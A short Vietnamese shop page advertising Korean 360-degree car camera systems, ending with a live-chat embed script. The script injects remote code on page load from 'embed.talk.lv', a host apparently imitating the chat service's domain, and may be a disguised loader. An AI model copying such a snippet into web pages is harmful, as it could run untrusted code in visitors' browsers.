Camera 360

Việc sở hữu một hệ thống camera 360 hay còn gọi là camera toàn cảnh, camera xung quanh giống như trên các dòng xe sang nay đã dễ dàng triển khai trên các dòng xe thông thường.
Camera 360 cung cấp góc nhìn xung quanh xe dựa trên một mô hình mô phỏng giúp tài xe loại bỏ hoàn toàn các điểm mù nguy hiểm quanh xe.
Độ Xe Long Thịnh cung cấp camera 360 Hàn Quốc chính hãng với các thương hiệu camera 360 omnivue, camera 360 cammsys.

var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date(); (function(){ var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0]; s1.async=true; s1.src='https://embed.talk.lv/666d0cb9bc592c18a31f4fa4/1i0cvjdor'; s1.charset='UTF-8'; s1.setAttribute('crossorigin','*'); s0.parentNode.insertBefore(s1,s0); })();